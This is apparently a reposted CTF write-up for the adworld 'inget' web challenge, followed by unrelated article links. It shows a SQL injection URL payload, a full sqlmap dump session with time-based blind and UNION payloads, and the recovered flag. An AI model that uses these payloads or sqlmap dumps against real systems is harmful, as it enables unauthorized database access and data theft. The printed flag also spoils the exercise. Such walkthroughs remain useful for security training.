程序员经验分享-hwhale

adworld-web-inget-20221226

2023-10-27

inget

题目来源: 宜兴网信办

题目描述:

题目场景:

http://61.147.171.105:51222

http://61.147.171.105:51222/?id=1%27%20%20or%201=1%20–+

Please enter ID,and Try to bypass

nice : congratulations

Flag Is : cyberpeace{3df1eecfb5f794d6a94eba429f7e2846}

image-20221226134703625

┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/inget]
└─$ sqlmap -u ‘http://61.147.171.105:51222/?id=1’ --dump
___
H
___ [.]__ ___ ___ {1.6.10#stable}
|_ -| . [‘] | .’| . |
|| [(]|||__,| |
||V… || https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:48:20 /2022-12-26/

[13:48:21] [INFO] resuming back-end DBMS ‘mysql’
[13:48:21] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1’ AND (SELECT 3300 FROM (SELECT(SLEEP(5)))mjGn) AND ‘TmJv’='TmJv

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x717a627171,0x564c495a6873625150554d5946684c5154454d797558544c7277594b565946744e774f496f756757,0x7162627a71),NULL-- -

[13:48:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[13:48:21] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:48:21] [INFO] fetching current database
[13:48:21] [INFO] fetching tables for database: ‘cyber’
[13:48:21] [INFO] fetching columns for table ‘cyber’ in database ‘cyber’
[13:48:21] [INFO] fetching entries for table ‘cyber’ in database ‘cyber’
Database: cyber
Table: cyber
[1 entry]
±—±---------------------------------------------±----------------+
| Id | pw | user |
±—±---------------------------------------------±----------------+
| 3 | cyberpeace{3df1eecfb5f794d6a94eba429f7e2846} | congratulations |
±—±---------------------------------------------±----------------+

[13:48:21] [INFO] table ‘cyber.cyber’ dumped to CSV file ‘/home/kwkl/.local/share/sqlmap/output/61.147.171.105/dump/cyber/cyber.csv’
[13:48:21] [INFO] fetched data logged to text files under ‘/home/kwkl/.local/share/sqlmap/output/61.147.171.105’

[*] ending @ 13:48:21 /2022-12-26/

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

网络安全

攻防世界CTF

Web

数据库

mysql

adworld-web-inget-20221226 的相关文章

随机推荐

  • react 实现一个简单的excel表格(可以改变宽度、实时输入、select *ui自行优化,思路可以参考)

    首先看效果 1 首先就是主要代码 index tsx import FC useEffect useRef useState from react import columns columnsType from config import

  • 【实验必用】使用ResNet18作为主干网络进行深度学习的Pytorch实现

    使用ResNet18作为主干网络进行深度学习的Python实现 一 ResNet18的Python复现 二 获取ResNet18的预训练模型 三 加载ResNet18预训练模型参数并设计自己的模型 一 ResNet18的Python复现 下

  • 当AD(Altium Designer)画PCB时Ctrl+H快捷键无法选中连线时的解决办法

    1 ctrl A先框选全部已画好的PCB 呈白色选中状态 2 注意你要选的是TopLayer还是BottomLayer ctrl H 选中一根连线即可 解决 ctrl H键恢复正常

  • 【Jmeter】基础介绍-详细

    最近做压测时使用到Jmeter 为什么用它 之前也做过部分压测 不是很系统 使用的是Apache Bench 虽然效率高 但是功能比较简单 不太适合本次压测场景 另外Jmeter能更好的利用压测机的多核性能 ab使用单核 如果需要使用多核需

  • 微信小程序:wx:for循环输出的使用方法以及简单例子

    今天来讲解下循环输出元素 后台存储的数据给事 var local database date Sep 18 2016 post title 冬日校花 post image images 1 jpg text 美呀 美呀 view num 1

  • 字节序说明并用C语言实现转换

    反转字节序之大小端转换 什么是大端和小段 举个例子 比如int类型的数 0x12345678在内存中的表现形式 1 大端模式 Big Endian就是高位字节排放在内存的低地址端 低位字节排放在内存的高地址端 低地址 gt 高地址 0x12

  • MYSQL数据库(八)数据库备份和恢复

    成功不易 加倍努力 5 备份和恢复 5 1 备份恢复概述 5 1 1 为什么要备份 5 1 2 备份类型 5 1 3 备份什么 5 1 4 备份注意要点 5 1 5 还原要点 5 1 6 备份工具 5 1 6 基于 LVM 的快照备份 5

  • 如何解决Conda Python版本冲突错误

    如何解决Conda Python版本冲突错误 环境 错误描述 解决方案 环境 WIN10 64bit Miniconda3 4 12 0 Python in Conda 3 9 12 错误描述 安装完Conda后 从开始菜单打 Anacon

  • Mysql基础1-介绍、安装

    1 初识Mysql 1 1 路线体系 业务级别mysql 运维级别mysql JavaEE 企业级开发 Web 前端 展示数据 后台 连接点 连接数据库JDBC 链接前端 控制 控制视图跳转给前端传递数据 数据库 存数据 TXT execl

  • element-ui踩坑

    element ui踩坑 1 使用websocket给前端vuex中传值并将vuex中的值实时渲染到页面表格 在element ui中提供的表格样式中 默认以 data tableData 的形式传入表格数据 其中tableData在vue

  • 标记-压缩算法

    版权声明 本文为博主原创文章 未经博主允许不得转载 https blog csdn net njys1 article details 53725240 GC标记压缩算法由标记阶段和压缩阶段组成 标记阶段和标记 清除算法的完全一致 接下来

  • VTK入门000——新建VTK项目

    选择Qt Widgets Application 设置项目名称和项目位置 并勾选 将解决方案和项目放在同一目录中 点击创建 视图 gt 其他窗口 gt 属性管理器 右键Debug 点击属性 添加附加包含项 C VTK vtk v9 1 0

  • LLVM学习(1)

    转自 https github com XChainLab documentation blob master VM EOS EOSVMArch md LLVM项目是一系列分模块 可重用的编译工具链 它提供了一种代码良好的中间表示 IR L

  • MySQL Workbench无法显示左侧的navigator,只显示Object info和Session

    原因 MySQL Workbench由于强制退出导致的配置文件损坏 解决办法 1 关闭MySQL Workbench 2 删除配置文件 cd Library Application Support MySQL Workbench rm wb

  • 解决Ubuntu18.04下Qt中无法输入中文的问题

    问题描述 我的中文输入法是搜狗的 但在qt中写代码时一直无法切换成中文 重启无效 原因 安装的qt中缺少中文输入环境 解决办法 进入到 usr lib x86 64 linux gnu qt5 plugins platforminputco

  • FAPI专题-1:5G nFAPI接口 - 中文规范-1- 概述、总体框架

    目录 前言 范围 第1章 简介 第2章 nFAPI接口详解 待续 2 1 nFAPI接口的主要流程 2 1 1 PNF的主要流程 M面 2 1 2 P5接口的主要流程 C面 2 1 3 P7接口的主要流程 U面 2 2 5G nFAPI接口

  • Ubuntu20.04下安装nvidia驱动

    ubuntu drivers devices 会显示你的电脑上可用的nvidia驱动 只需要安装推荐的版本即可 后面有recommend字样 打开电脑里的软件和更新app 这里建议换提前换源 阿里源或者清华源 来到附加驱动这个页面 选择你刚

  • 毕设分享 机器人工程专业毕设选题推荐

    文章目录 1前言 2 如何选题 3 机器人工程 毕设 选题推荐 4 最后 1前言 近期不少学弟学妹询问学长关于机器人工程专业工程专业相关的毕设选题 学长特意写下这篇文章以作回应 以下是学长亲手整理相关的毕业设计选题 都是经过学长精心审核的题

  • 使用laravel-admin后台sdk报错Failed to load resource: net::ERR_CERT_AUTHORITY_INVALID、Provisional headers a...

    报错Failed to load resource net ERR CERT AUTHORITY INVALID请先确定自己的资源url是否可以确实访问到 地址正确与否 访问权限是否开启等 若network中有静态资源报错Provision

  • adworld-web-inget-20221226

    inget 题目来源 宜兴网信办 题目描述 无 题目场景 http 61 147 171 105 51222 http 61 147 171 105 51222 id 1 27 20 20or 201 1 20 Please enter I

热门标签